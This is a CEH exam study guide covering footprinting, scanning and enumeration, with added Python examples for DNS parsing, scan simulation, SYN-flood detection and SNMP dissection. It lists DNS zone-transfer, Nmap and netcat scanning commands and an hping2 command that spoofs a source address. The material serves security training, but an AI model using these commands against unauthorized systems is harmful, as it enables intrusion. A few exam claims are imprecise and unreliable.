2009 C|EH Study Guide
Parameter Security 12/1/2009
C|EH Study Guide

Table of Contents

CEH v6 Study Guide (page 4)
   Introduction to Ethical Hacking (page 4)
   Footprinting (page 5)
   Scanning (page 7)
   Enumeration (page 12)
   System Hacking (page 12)
   Trojans and Backdoors (page 16)
   Sniffers (page 16)
   Denial of Service (page 17)
   Session Hijacking (page 18)
   Buffer Overflows (page 19)
   Hacking Web Servers (page 20)
   Web Application Vulnerabilities (page 21)
   Web Based Password Cracking (page 22)
   Linux Hacking (page 22)
   Cryptography (page 23)
   SQL Injection (page 24)
   Hacking Wireless Networks (page 25)
   Viruses (page 25)
   Evading IDS, Firewalls, and Honeypots (page 26)
   Social Engineering (page 28)
   Physical Security (page 28)
Attack Analysis (page 29)
   Attack #1 (page 29)
   Attack #2 (page 29)
   Attack #3 (page 30)
   Attack #4 (page 31)
   Attack #5 (page 31)
   Attack #6 (page 31)
   Attack #7 (page 32)
   Attack #8 (page 33)

Hacker University
Page 2

   Attack #9 (page 34)
   Attack #10 (page 36)
   Attack #11 (page 37)
   Attack #12 (page 38)
   Attack #13 (page 38)
   Attack #14 (page 39)
   Attack #15 (page 39)
Labs (page 40)
   Footprinting (page 40)
   Scanning (page 41)
   Enumeration (page 42)
   System Hacking (page 42)
   Trojans and Backdoors (page 43)
   Sniffers (page 44)
   Denial Of Service (page 45)
   Session Hijacking (page 46)
   Buffer Overflow (page 52)
   Hacking Web Servers (page 55)
   Web Application Vulnerabilities (page 55)
   Linux Hacking (page 56)
   SQL Injection (page 57)
   Wireless Hacking (page 60)
   Viruses (page 60)
CEH v6 Study Guide

Introduction to Ethical Hacking

1. The five steps of malicious hacking are:
   Reconnaissance
   Scanning
   Gaining Access
   Maintaining Access
   Covering Tracks
2. Active attacks are typically more intrusive and therefore more easily detected.
3. Passive attacks include information gathering through web search engines, DNS queries, etc. Note: scanning the range of IP addresses found in a company's DNS database is NOT passive footprinting.
4. A black hat hacker is malicious and is sometimes called a cracker.
5. A white hat hacker is an ethical hacker. An ethical hacker does it for defensive purposes and has permission. A white hat hacker is an ethical hacker that runs tests, writes reports, and signs all legal non-disclosure documents prior to working on a test.
6. Hacktivism is hacking for social, political, and religious causes.
7. Black box testing is when you have no knowledge of a target. You are only given a company name.
8. White box testing is when you have full knowledge.
9. Gray box testing, also called internal testing, is when you perform attacks with a normal user account to see if you can escalate privileges.
10. Insiders are common sources of attacks. Examples of insiders include disgruntled employees, customers, suppliers, vendors, business partners, contractors, temps, and consultants.
11. A company is legally liable for the content of e-mail that is sent from its systems, regardless of whether the message was sent for private or business-related purposes. You cannot claim ignorance of the law to avoid prosecution.
12. Every company should have an Information Security Policy (ISP) that informs employees about what they are allowed to use the company's systems for, what is prohibited, and what should happen if they break the rules.
13. The United States CAN-SPAM Act criminalizes the transmission of unsolicited commercial e-mail (SPAM) without an existing business relationship.
14. The Computer Misuse Act 1990 is a United Kingdom (UK) law that makes hacking into an unauthorized network a felony.
15. The first step an attacker will take is to perform a reconnaissance of the remote target.
16. Educate everyone with books, articles, and training on risk analysis, vulnerabilities, and safeguards to bridge the gap between black hats and white hats.
17. Suicide hackers are those hackers that do not care about being caught.
18. The FBI investigates computer crimes involving e-mail scams and mail fraud using 18 U.S.C. 1030, Fraud and Related Activity in Connection with Computers.
19. An exploit takes advantage of vulnerabilities in a system in the pursuit of some objective.
Footprinting

20. Footprinting is the blueprinting of the security profile of an organization.
21. Examples of footprinting tools include:
   SamSpade
   NSLookup
   Traceroute
   NeoTrace
22. NSLookup is a program to query Internet domain name servers. It is used to display DNS information.
23. Type the following to do a zone transfer with NSLookup:
   nslookup               (takes you into interactive mode)
   ls -d targetsite.com
24. Zone transfers allow you to list all DNS information for a domain.
25. Below is an example of a log entry that shows a possible zone transfer:
   Mar 12 01:44:12 [3142]: IDS181/nops-x86: 12.55.180.48 -> 10.8.0.7:53
26. There are several types of DNS records:
   A - host record
   CNAME - alias
   MX - mail exchange (mail server)
   NS - name server
   SOA - start of authority
27. A DNS zone is a collection of domains. You can use tools such as NSLookup, Dig, Sam Spade, or Host to perform a zone transfer.
28. The highest priority MX record has the lowest number.
29. A DNS SOA record will contain the following:
   Serial number - revision number (sometimes called the 'version' number)
   Refresh - refresh interval for secondary DNS servers
   Retry - retry interval if a zone transfer fails
   Expire - how long the secondary server will hold onto the record if it does not receive an update (e.g., 604800 = one week)
   TTL - default TTL for client name resolution
30. A secondary name server will request a zone transfer from a primary name server when the primary's SOA serial is higher than the secondary's.
31. Traceroute works by manipulating the TTL field to elicit a "time exceeded in transit" message. It is commonly used to find the route to a target system. While it commonly uses UDP and ICMP, traceroute can use any protocol. Therefore, blocking ICMP and UDP is not enough to prevent hackers from tracerouting into your network. There is no way to completely block tracerouting.
32. Dumpster diving is when you search through garbage, recycled paper, and other rubbish to collect information about a company.
33. The Netcraft web site is a passive tool that you can use to see the operating system a web server is using.
34. Archive.org allows you to retrieve an archive of a company's web site.
35. There are five Regional Internet Registries (RIRs):
   ARIN (North America) - used for .com addresses
   APNIC (Asia Pacific)
   LACNIC (South and Central America) - used for places like Panama
   RIPE (Europe, Northern Africa)
   AfriNIC (Sub-Saharan Africa) - note: the test may not be updated to include AfriNIC
36. Examples of passive footprinting include searching web sites, performing queries on search engines, and going through rubbish to find information.
37. Using Whois and Netcraft is considered passive scanning.
38. Hackers can use job postings to determine the operating systems and applications being used at a company.
39. Passive information gathering includes discovering which web domains a company is using.
40. You can use Google to determine if a company's web site is linked by other sites. This is useful in footprinting. For example, to find all sites that have links to www.eccouncil.org, type link:www.eccouncil.org into Google.
41. You can search Google for different types of systems on the Internet. For example, to search for all BorderManager Proxy/Firewalls, type intitle:"BorderManager information alert".
42. Technical information is often revealed in newsgroup postings. You can use NNTP websites to search for newsgroup postings by a target company.
43. You should not use an AD-integrated DNS server for Internet domains.
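The SOA fields, MX priority and zone-transfer rule in items 26 through 30 are easiest to remember when you check them against real records, which is what a defender does when verifying that a secondary server is in sync. The following parser is an added example written for this guide, not part of the original study guide or of any DNS tool; the zone name, serials and addresses are constructed (documentation ranges), and the wrap-around serial comparison is the RFC 1982 rule that the guide summarises as "higher".

```python
from dataclasses import dataclass

# Constructed sample answer section in the layout "dig" prints (hypothetical zone,
# addresses from the documentation ranges; none of this is real data).
ZONE_RECORDS = """
example-corp.test.          3600 IN SOA   ns1.example-corp.test. hostmaster.example-corp.test. 2009120101 10800 3600 604800 86400
example-corp.test.          3600 IN NS    ns1.example-corp.test.
example-corp.test.          3600 IN NS    ns2.example-corp.test.
example-corp.test.          3600 IN MX    20 backup-mail.example-corp.test.
example-corp.test.          3600 IN MX    10 mail.example-corp.test.
www.example-corp.test.      3600 IN A     192.0.2.10
mail.example-corp.test.     3600 IN A     192.0.2.25
intranet.example-corp.test. 3600 IN CNAME www.example-corp.test.
"""

SERIAL_MOD = 2 ** 32          # SOA serials are 32-bit unsigned and wrap around


@dataclass
class SOA:
    primary_ns: str           # MNAME: the primary name server for the zone
    contact: str              # RNAME: zone contact mailbox, '@' written as '.'
    serial: int               # revision number; secondaries compare this
    refresh: int              # how often a secondary asks the primary for the SOA
    retry: int                # how long to wait after a failed transfer
    expire: int               # how long a secondary keeps serving stale data
    minimum_ttl: int          # negative-caching TTL (the guide's "default TTL")


def parse_records(text):
    """Turn each 'name ttl class type rdata...' line into a (name, ttl, type, rdata) tuple."""
    records = []
    for line in text.strip().splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue
        name, ttl, _cls, rtype = parts[:4]
        records.append((name, int(ttl), rtype, parts[4:]))
    return records


def parse_soa(records):
    """Pull the SOA fields out of the record list in the order the guide lists them."""
    for _name, _ttl, rtype, rdata in records:
        if rtype == "SOA":
            mname, rname, *numbers = rdata
            serial, refresh, retry, expire, minimum = map(int, numbers)
            return SOA(mname, rname, serial, refresh, retry, expire, minimum)
    raise ValueError("no SOA record in zone data")


def preferred_mx(records):
    """Item 28: the MX with the lowest preference number has the highest priority."""
    candidates = [(int(rdata[0]), rdata[1]) for _, _, rtype, rdata in records if rtype == "MX"]
    return min(candidates)[1]


def serial_is_newer(primary_serial, secondary_serial):
    """RFC 1982 comparison: 'newer' means 0 < (a - b) mod 2^32 < 2^31, so a serial
    that wrapped past 4294967295 back to a small number still counts as newer."""
    diff = (primary_serial - secondary_serial) % SERIAL_MOD
    return 0 < diff < SERIAL_MOD // 2


def zone_transfer_needed(primary, secondary):
    """Item 30: a secondary requests a transfer when the primary's SOA serial is newer."""
    return serial_is_newer(primary.serial, secondary.serial)


def expire_in_days(soa):
    """Item 29: an EXPIRE of 604800 seconds is one week."""
    return soa.expire / 86400
```

Feed `parse_records` the answer section of your own `dig SOA` / `dig MX` output and compare the primary's serial with each secondary's; a secondary whose serial never catches up is either blocked from transfers or pointed at the wrong primary.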
Scanning

44. To discover what telephone numbers you can use to dial into a router, use a war-dialing tool with a range of phone numbers and look for a CONNECT response.
45. Once footprinting is completed, the next step is scanning.
46. Common war dialing tools include:
   THC-Scan
   ToneLoc
   TBA
47. Firewalking is a technique used to discover what rules are configured on a gateway. It sends packets to various ports (usually 1-1024) with the exact TTL of the target. You can use Hping2 to do firewalking.
48. An IDLE scan monitors the IP ID value of an idle host. If this value increments by more than one, then the port is open on the target system.
49. Windows machines do not respond to broadcast pings or pings directed at a network address.
50. A clue that someone is doing an SNMP walk on your system is seeing a series of items separated by periods in your log files. Example: system.sysName, system.sysObjectID
51. SNMP is a connectionless protocol that uses UDP port 161. The default passwords used by SNMP are private and public.
52. Cisco routers can protect against SNMP attacks by using access lists. For example, the following commands will only allow hosts on the 192.168.99.0/24 network to read and write information via SNMP. This configuration does not prevent someone from running a network sniffer and capturing returned traffic with the configuration file. It also does not prevent someone from sending a customized SNMP set request with a spoofed source IP address.
   access-list 1 permit 192.168.99.0 0.0.0.255
   !
   snmp-server community public RO
   snmp-server community private RW 1
53. An SNMP scanner will send SNMP requests to multiple IP addresses, trying different community strings, and wait for a reply. If you get no reply, it could be that the SNMP server is not running, you have tried an invalid community string, or the machine is unreachable.
54. SNMP uses community strings that are transmitted in clear text and are therefore susceptible to sniffing.
55. TCP/IP Concepts
   The three-way handshake is SYN, SYN-ACK, ACK.
   You cannot spoof your IP address and successfully use TCP.
   The FIN flag is used to close a TCP connection when a host has no more data to transmit. However, a host can continue to receive data as long as the sequence number of the transmitted packets is lower than that of the segment containing the FIN flag.
   The receiving host sets the window size, which specifies the number of packets it will receive before sending an acknowledgement.
   0xFFFFFFFFFFFF is the destination MAC address of a broadcast frame.
   In TCP communication, a host will set its acknowledgement number to the sequence number it just received plus one. For example, if a host just received sequence number 100, it will respond with acknowledgement number 101.
   There are 1024 well-known ports (for this exam).
56. OS fingerprinting is the process of determining the operating system of your target. Fingerprinting an operating system does not depend on patches that have been applied. With Nmap you can do OS fingerprinting with the -O command line switch. Queso is another tool that can be used for OS fingerprinting.
57. The default behavior of an Nmap scan is to do both an ICMP ping sweep (ICMP ECHO_REQUEST) and a TCP ACK ping sweep.
58. ICMP types/codes:
   Type 0 code 0 = Echo Reply (used with the ping command)
   Type 3 code 13 = Destination unreachable: administratively prohibited (this message is given by routers when a router is blocking ICMP)
   Type 8 code 0 = Echo (used with the ping command)
   Type 11 code 0 = Time exceeded
   Type 13 code 0 = Timestamp request
   Type 14 code 0 = Timestamp reply
   Type 17 code 0 = Address mask request
   Type 18 code 0 = Address mask reply
59. There are several methods of scanning with Nmap:
   Scan Type                  Nmap Command   Bits set      Response when port is open                      Response when port is closed
   TCP Connect()              nmap -sT       SYN           SYN/ACK                                         RST
   SYN (a.k.a. stealth scan)  nmap -sS       SYN           SYN/ACK (SYN scans do not respond to SYN/ACKs)  RST
   FIN                        nmap -sF       FIN           (nothing)                                       RST
   XMAS                       nmap -sX       FIN/URG/PSH   (nothing)                                       RST
   Null                       nmap -sN       None          (nothing)                                       RST
60. A fragmentation scan sends the probe packet and splits the TCP header over several packets to make it harder for packet filters to detect what is happening.
61. A TCP Connect scan is the most accurate and reliable.
62. The three inverse scans are FIN (FIN bit), XMAS (FIN/URG/PSH) and NULL (no bits). The inverse scans will report nothing for an open port and a RST for a closed port. Windows does not comply with the RFC and therefore will report all ports as closed when performing these scans.
63. SAINT is a vulnerability scanner that only works on Linux and UNIX.
64. Connect scans should be used when you need reliable and quick results but do not care about being stealthy.
65. A distributed port scan operates by having multiple computers each scan a small number of ports, then correlating the results.
66. Many of the Nmap commands in Linux must be run in the context of the root user. For example, to run a ping scan against the 192.168.1.15 host, type sudo nmap -sP 192.168.1.0/24.
67. A ping scan will produce results similar to the following:
   Host 192.168.1.1 appears to be up.
   MAC Address: 00:13:55:3F:1C:44 (Cisco-Linksys)
   Host 192.168.1.2 appears to be up.
   MAC Address: 00:55:23:8D:00:1E (Compaq Computer)
68. Nmap will try to guess the operating system when it does a scan against a computer. Sometimes it is unable to detect the operating system. However, by looking at the open ports you can often determine what type of machine it is. For example, while there is no way of telling for sure, the following output is most likely a Windows Domain Controller because LDAP is open.
   21/tcp   open  ftp
   25/tcp   open  smtp
   80/tcp   open  http
   389/tcp  open  ldap
   443/tcp  open  https
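A simulated responder makes the scan table in item 59, the Windows caveat in item 62 and the sequence/acknowledgement arithmetic in item 55 concrete without sending a single packet. This is an added example written for this guide, not Nmap's code and not from the original study guide: the host model follows what the table states (the ACK-probe rule is taken from item 88 later in this section), the half-open teardown with RST is an assumption about scanner behaviour, and all port numbers and initial sequence numbers are made up.

```python
from dataclasses import dataclass, field

# Flag sets of the probes in the guide's table (item 59) plus the ACK probe (item 88).
PROBE_FLAGS = {
    "connect": frozenset({"SYN"}),
    "syn": frozenset({"SYN"}),
    "fin": frozenset({"FIN"}),
    "xmas": frozenset({"FIN", "URG", "PSH"}),
    "null": frozenset(),
    "ack": frozenset({"ACK"}),
}
INVERSE_SCANS = ("fin", "xmas", "null")
INVERSE_FLAGS = tuple(PROBE_FLAGS[name] for name in INVERSE_SCANS)


@dataclass
class SimulatedHost:
    """A TCP/IP stack that answers probes the way the study guide's table says a host does."""
    open_ports: set
    filtered_ports: set = field(default_factory=set)   # silently dropped by a firewall rule
    rfc_compliant: bool = True   # False models Windows: RST to every inverse-scan probe (item 62)

    def respond(self, port, flags):
        flags = frozenset(flags)
        if port in self.filtered_ports:
            return None                                 # filtered: nothing comes back
        is_open = port in self.open_ports
        if flags == PROBE_FLAGS["syn"]:
            return "SYN/ACK" if is_open else "RST"      # a listener answers the handshake
        if flags == PROBE_FLAGS["ack"]:
            return "RST"                                # unfiltered port: RST whether open or closed
        if flags in INVERSE_FLAGS:
            if not self.rfc_compliant:
                return "RST"                            # Windows: every port looks closed
            return None if is_open else "RST"           # RFC 793: open port is silent, closed sends RST
        raise ValueError(f"unmodelled flag combination: {sorted(flags)}")


def three_way_handshake(client_isn, server_isn):
    """Item 55: each side acknowledges the sequence number it just received plus one.
    Returns the three segments as (sender, flags, seq, ack)."""
    syn = ("client", "SYN", client_isn, None)
    syn_ack = ("server", "SYN/ACK", server_isn, client_isn + 1)
    ack = ("client", "ACK", client_isn + 1, server_isn + 1)
    return [syn, syn_ack, ack]


def scan_port(host, scan_type, port):
    """Interpret the host's answer to one probe the way the guide's table does."""
    reply = host.respond(port, PROBE_FLAGS[scan_type])
    if scan_type == "ack":
        return "unfiltered" if reply == "RST" else "filtered"
    if scan_type in INVERSE_SCANS:
        return "closed" if reply == "RST" else "open"
    # connect and SYN scans: SYN/ACK means open, RST means closed, silence means filtered
    return {"SYN/ACK": "open", "RST": "closed"}.get(reply, "filtered")


def probe_transcript(host, scan_type, port, client_isn=1000, server_isn=5000):
    """Show why a SYN scan is called stealthy: it never completes the handshake.
    Assumption: the scanner aborts the half-open connection with a RST (as Nmap does)."""
    reply = host.respond(port, PROBE_FLAGS["syn"])
    segments = [("scanner", "SYN", client_isn, None)]
    if reply == "SYN/ACK":
        segments.append(("target", "SYN/ACK", server_isn, client_isn + 1))
        if scan_type == "connect":
            segments.append(("scanner", "ACK", client_isn + 1, server_isn + 1))   # full connection
        else:
            segments.append(("scanner", "RST", client_isn + 1, None))          # half-open, then abort
    elif reply == "RST":
        segments.append(("target", "RST", 0, client_isn + 1))
    return segments
```

Running `probe_transcript` for "connect" and "syn" against the same open port shows the only difference a host-based log would see: the connect scan finishes with an ACK and therefore appears in the application's accept log, the SYN scan never gets past the kernel.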
69. Stealth scans do not open a full TCP connection.
70. If you see someone trying to scan port 500 (ISAKMP), they might be trying to determine the type of VPN implementation you are using and checking for IPSec.
71. Nmap can be used to scan multiple networks. For example, the command nmap 215.55.12-13.* will scan 512 hosts.
72. If you are not getting a ping response using ICMP, it might be because ICMP is being blocked. Try Hping2 instead because it uses stealth TCP packets to connect instead of ICMP.
73. LDAP (TCP 389) and MS-SQL-S (TCP 1433) are ports that are often open on Windows 2000 servers.
74. Ping sweeps may not return results if:
   The host is down
   ICMP is being filtered
   The packet TTL value is too low
   The destination network is down
75. You can scan for protocols in use on a target by using the nmap -sO command. This will show up in a tcpdump with the words ip-proto-.
76. If pings and basic port scans fail, try using an inverse scan like XMAS.
77. LDAP uses port 389.
78. The -O switch in Nmap is used for OS detection.
79. If you see suspicious traffic on port 53, check to see if an attacker is trying to do a DNS zone transfer.
80. Netstat has a number of switches. The netstat -anb -p tcp command will return all listening ports as well as the files that use those ports.
   C:\>netstat -anb -p tcp
   Active Connections
     Proto  Local Address  Foreign Address  State      PID
     TCP    0.0.0.0:135    0.0.0.0:0        Listening  125
     C:\windows\system32\ws2_32.dll
     C:\windows\system32\RPCRT4.dll
     C:\windows\system32\rpcss.dll
     C:\windows\system32\svchost.exe
     C:\windows\system32\ADVAPI32.dll
     [svchost.exe]
81. Hping2 has many options. The following command will generate a single TCP SYN packet with a source port of 2000, destination port 30, and sequence number 15, spoofing the IP address 172.16.0.5:
   Linux# hping2 -I ether0 -a 172.16.0.5 -s 2000 -p 30 --syn -c 1 -d 0xF00 --setseq 0x0000000f 10.0.0.1
82. Hping2 is a pinging tool and a packet assembler. Here is another example of Hping2:
   # hping2 10.0.0.1 --seqnum -p 139 -S -i u1 -I eth0
   HPING uaz (eth0 10.0.0.1) S set, 40 headers + 0 data bytes
   2361294848 +2361294848
   2411626596 +50331648
   The first number is the sequence number and the second is the offset.
83. Floppyscan is a utility loaded on a floppy disk that will cause a Blue Screen of Death to appear on your monitor while it performs a port scan in the background.
84. The best defense against Hping2 attacks is to use stateful packet inspection on your firewalls.
85. You can specify ports to scan with Nmap using the -p switch. For example, to scan the lower 1024 UDP ports, execute the following command: nmap -sU -p 1-1024
86. You can use Netcat to scan ports: nc -u 1-1024
87. You can scan for IP protocols using the command nmap -sO. Look for the text "ip-proto" in tcpdump output to tell if someone is doing an IP protocol scan.
88. ACK scans are used to scan and enumerate the rule sets on firewalls. If a port is being filtered by a rule set you will get nothing back. If the port is not being filtered then you should get a RST. Responses to an ACK scan:
   UNFILTERED: RST
   FILTERED: (nothing)
89. Security scanners are only as smart as their database and cannot find unpublished vulnerabilities.
90. You cannot block a hacker from doing a FIN, NULL, or XMAS scan on your network.
91. The attack signature for SYN floods is a large number of SYN packets appearing on a network without the corresponding reply packets.
92. SandTrap can be used to notify you if anyone tries to break into your PBX.
93. You cannot stop a hacker from launching FIN, NULL, or XMAS scans on your network.
94. If you are concerned that someone could block your scans and you want to slow your scans down, try using the -T0 or -T1 switch to change the timing.
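The SYN-flood signature in item 91 and the probe flag sets from the item 59 table are enough to write a first-pass detector over packet summaries, which is how a defender would turn these exam facts into an alert. The code below is an added example written for this guide, not from the original text or any IDS: the tcpdump-like lines are constructed (documentation address ranges, simplified format), the thresholds are arbitrary, and it reads the guide's "SYNs without the corresponding replies" as SYNs that never progress to a completed handshake, which covers both a server that cannot answer and a spoofed client that never sends the final ACK.

```python
import re
from collections import defaultdict

# Constructed, simplified tcpdump-style summaries. Flags use tcpdump's letters:
# S = SYN, S. = SYN/ACK, . = ACK, R. = RST/ACK, F = FIN, FPU = XMAS, empty = NULL.
SAMPLE_TRAFFIC = """
10:00:01.000 IP 198.51.100.7.40001 > 192.0.2.10.80: Flags [S]
10:00:01.001 IP 192.0.2.10.80 > 198.51.100.7.40001: Flags [S.]
10:00:01.002 IP 198.51.100.7.40001 > 192.0.2.10.80: Flags [.]
10:00:02.000 IP 203.0.113.11.1001 > 192.0.2.10.80: Flags [S]
10:00:02.001 IP 192.0.2.10.80 > 203.0.113.11.1001: Flags [S.]
10:00:02.002 IP 203.0.113.12.1002 > 192.0.2.10.80: Flags [S]
10:00:02.003 IP 192.0.2.10.80 > 203.0.113.12.1002: Flags [S.]
10:00:02.004 IP 203.0.113.13.1003 > 192.0.2.10.80: Flags [S]
10:00:02.005 IP 192.0.2.10.80 > 203.0.113.13.1003: Flags [S.]
10:00:02.006 IP 203.0.113.14.1004 > 192.0.2.10.80: Flags [S]
10:00:02.008 IP 203.0.113.15.1005 > 192.0.2.10.80: Flags [S]
10:00:03.000 IP 203.0.113.9.5555 > 192.0.2.10.21: Flags [FPU]
10:00:03.001 IP 192.0.2.10.21 > 203.0.113.9.5555: Flags [R.]
10:00:03.002 IP 203.0.113.9.5555 > 192.0.2.10.22: Flags [FPU]
10:00:03.003 IP 192.0.2.10.22 > 203.0.113.9.5555: Flags [R.]
10:00:03.004 IP 203.0.113.9.5555 > 192.0.2.10.23: Flags [FPU]
10:00:03.005 IP 192.0.2.10.23 > 203.0.113.9.5555: Flags [R.]
10:00:03.006 IP 203.0.113.9.5555 > 192.0.2.10.25: Flags [FPU]
"""

LINE_RE = re.compile(
    r"^\S+ IP (?P<src>\d+(?:\.\d+){3})\.(?P<sport>\d+) > "
    r"(?P<dst>\d+(?:\.\d+){3})\.(?P<dport>\d+): Flags \[(?P<flags>[^\]]*)\]"
)

# Probe types by flag set, named as the guide's table names them.
PROBE_NAMES = {"S": "SYN", "F": "FIN", "FPU": "XMAS", "": "NULL", ".": "ACK"}


def parse(text):
    """Return (src, sport, dst, dport, flags) for every line that matches the summary format."""
    packets = []
    for line in text.strip().splitlines():
        m = LINE_RE.match(line)
        if m:
            d = m.groupdict()
            packets.append((d["src"], int(d["sport"]), d["dst"], int(d["dport"]), d["flags"]))
    return packets


def syn_flood_candidates(packets, min_syns=5, max_completion=0.2):
    """Item 91: destinations receiving many SYNs of which almost none complete a handshake.
    Returns {(dst, dport): (syns_seen, handshakes_completed)}."""
    syns = defaultdict(int)
    completed = defaultdict(int)
    awaiting_ack = set()          # (client, cport, server, sport) that has received a SYN/ACK
    for src, sport, dst, dport, flags in packets:
        if flags == "S":
            syns[(dst, dport)] += 1
        elif flags == "S.":
            awaiting_ack.add((dst, dport, src, sport))   # the reply travels server -> client
        elif flags == "." and (src, sport, dst, dport) in awaiting_ack:
            awaiting_ack.discard((src, sport, dst, dport))
            completed[(dst, dport)] += 1
    return {key: (n, completed[key]) for key, n in syns.items()
            if n >= min_syns and completed[key] / n <= max_completion}


def port_scan_candidates(packets, min_ports=4):
    """One source probing many distinct ports on one host with the same probe type.
    Returns {(src, dst, probe_type): sorted list of ports probed}."""
    probed = defaultdict(set)
    for src, sport, dst, dport, flags in packets:
        probe = PROBE_NAMES.get(flags)
        if probe is not None:
            probed[(src, dst, probe)].add(dport)
    return {key: sorted(ports) for key, ports in probed.items() if len(ports) >= min_ports}


def inverse_scan_open_guess(packets):
    """Items 62 and 90: for FIN/XMAS/NULL probes, a port that never answers with RST is what the
    scanner will report as open; listing them shows what the attacker learned. Returns {(src, dst): ports}."""
    probes, rst_seen = defaultdict(set), set()
    for src, sport, dst, dport, flags in packets:
        if PROBE_NAMES.get(flags) in ("FIN", "XMAS", "NULL"):
            probes[(src, dst)].add(dport)
        elif flags.startswith("R"):
            rst_seen.add((dst, src, sport))          # RST from server port sport back to client
    return {key: sorted(p for p in ports if (key[0], key[1], p) not in rst_seen)
            for key, ports in probes.items()}
```

On the sample, the flood detector reports 192.0.2.10:80 with six SYNs and one completed handshake, the scan detector attributes an XMAS scan of four ports to 203.0.113.9, and the open-port guess shows that port 25 was the only one that stayed silent.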
95. In a UDP port scan, an open port will not respond and a closed port (e.g., a port not being used) will send an ICMP message stating that the port is unreachable.
96. A program that defends against a port scanner will attempt to update a firewall rule in real time to prevent the port scan from being completed.
97. Fragmentation scanning splits the TCP header over several packets to make it harder for packet filters to detect what is happening.
98. Port scanning is an information gathering attack.
99. Nessus is an automated vulnerability assessment tool that has a database containing signatures that is able to detect hundreds of vulnerabilities. One disadvantage of an automated vulnerability assessment tool is that it is noisy.
100. After doing a port scan you should connect to open ports to discover applications.
101. Static network address translation maps a single machine on an internal network to a single public IP address.
102. Look in %windir%\system32\drivers\etc\services to find the port number for POP3 on your server. (Note: POP3 is used to receive e-mail.)
Enumeration

103. If Nmap was unable to identify the operating system of a web server, telnet to an open port and grab the banner.
104. Enumeration tools include USER2SID, SID2USER, and DumpSec.
105. The SID ending in 500 is the built-in Administrator account.
106. If the Administrator account has been renamed but you still know the SID, you can use sid2user to find the new name of the Administrator account.
107. The default passwords (community strings) in SNMP are private (read-write) and public (read-only). These community strings are sent in clear text and are therefore susceptible to sniffing.
108. You should use SMB signing to protect against hackers modifying SMB packets and forwarding them.
109. If you must run an SMTP server, you cannot prevent people from using telnet to connect to port 25 on your e-mail server.
110. Hackers will often send a single SMTP message to an address that does not exist to gather information about internal hosts used in e-mail handling.
111. To grab the banner of a web server, telnet to port 80 and type HEAD / HTTP/1.0.
112. An attacker may scan port 137 to check for file and print sharing on Windows systems.
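Items 51 through 54 and item 107 all come down to one fact: an SNMPv1 community string is an unencrypted OCTET STRING a few bytes into the datagram, so anyone who can read the packet can read the "password". The encoder/decoder below is an added example written for this guide, not part of the original text or of any SNMP library; it implements just enough BER (the ASN.1 encoding SNMP uses) to build a GetRequest and dissect it the way a sniffer would, and the community strings and OIDs are constructed. The symbolic names map the numeric OIDs onto the dotted "system.sysName" form that item 50 says shows up in logs.

```python
# Minimal BER for SNMPv1: SEQUENCE (0x30), INTEGER (0x02), OCTET STRING (0x04),
# NULL (0x05), OBJECT IDENTIFIER (0x06) and the context-specific PDU tags.
PDU_TAGS = {0xA0: "GetRequest", 0xA1: "GetNextRequest", 0xA2: "GetResponse", 0xA3: "SetRequest"}
SYMBOLIC = {"1.3.6.1.2.1.1.2": "system.sysObjectID", "1.3.6.1.2.1.1.5": "system.sysName"}


def ber_length(n):
    """Short form below 128, long form (0x8N followed by N big-endian bytes) above."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag, payload):
    return bytes([tag]) + ber_length(len(payload)) + payload


def ber_int(value):
    """Non-negative INTEGER; the extra leading byte keeps the sign bit clear."""
    return tlv(0x02, value.to_bytes(value.bit_length() // 8 + 1, "big"))


def ber_oid(dotted):
    ids = [int(x) for x in dotted.split(".")]
    out = [ids[0] * 40 + ids[1]]                 # first two sub-identifiers share one byte
    for sub in ids[2:]:
        chunk = [sub & 0x7F]
        sub >>= 7
        while sub:                               # base-128, high bit set on all but the last byte
            chunk.append(0x80 | (sub & 0x7F))
            sub >>= 7
        out.extend(reversed(chunk))
    return tlv(0x06, bytes(out))


def snmpv1_request(community, oids, request_id=1, pdu_tag=0xA0):
    """Build the datagram an SNMP manager (or scanner) sends; version 0 means SNMPv1."""
    varbinds = b"".join(tlv(0x30, ber_oid(o) + tlv(0x05, b"")) for o in oids)
    pdu = tlv(pdu_tag, ber_int(request_id) + ber_int(0) + ber_int(0) + tlv(0x30, varbinds))
    return tlv(0x30, ber_int(0) + tlv(0x04, community.encode("ascii")) + pdu)


def read_tlv(buf, pos=0):
    """Return (tag, payload, position after this element)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length


def decode_oid(payload):
    ids, value = [payload[0] // 40, payload[0] % 40], 0
    for b in payload[1:]:
        value = (value << 7) | (b & 0x7F)
        if not b & 0x80:
            ids.append(value)
            value = 0
    return ".".join(map(str, ids))


def symbolic(oid):
    """Render an OID the way item 50 says it appears in logs, e.g. system.sysName.0."""
    for prefix, name in SYMBOLIC.items():
        if oid == prefix or oid.startswith(prefix + "."):
            return name + oid[len(prefix):]
    return oid


def dissect(packet):
    """What a sniffer sees: version, community string and requested OIDs, all in the clear."""
    tag, msg, _ = read_tlv(packet)
    if tag != 0x30:
        raise ValueError("not an SNMP message")
    _, version, pos = read_tlv(msg)
    _, community, pos = read_tlv(msg, pos)
    pdu_tag, pdu, _ = read_tlv(msg, pos)
    _, req_id, pos = read_tlv(pdu)
    _, _status, pos = read_tlv(pdu, pos)
    _, _index, pos = read_tlv(pdu, pos)
    _, varbind_list, _ = read_tlv(pdu, pos)
    oids, pos = [], 0
    while pos < len(varbind_list):
        _, varbind, pos = read_tlv(varbind_list, pos)
        _, oid, _ = read_tlv(varbind)
        oids.append(decode_oid(oid))
    return {"version": int.from_bytes(version, "big"), "community": community.decode("ascii", "replace"),
            "pdu": PDU_TAGS.get(pdu_tag, hex(pdu_tag)), "request_id": int.from_bytes(req_id, "big"),
            "oids": oids, "names": [symbolic(o) for o in oids]}
```

The practical consequence for the Cisco configuration in item 52: an access list limits who may ask, but because the community string is visible in every datagram, a sniffer on the path learns both the read-only and the read-write string; only SNMPv3 authentication and privacy close that gap.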
System Hacking

113. If L0phtcrack is unable to capture any logons when attempting to sniff SMB exchanges, it could be that the network is using Kerberos.
114. Alternate Data Streams (ADS) are found in all versions of NTFS and are described as the ability to fork file data into existing files without affecting their functionality, size, or display to traditional file browsing utilities like dir or Windows Explorer.
115. A hardware keylogger cannot be detected by anti-virus or anti-spyware products.
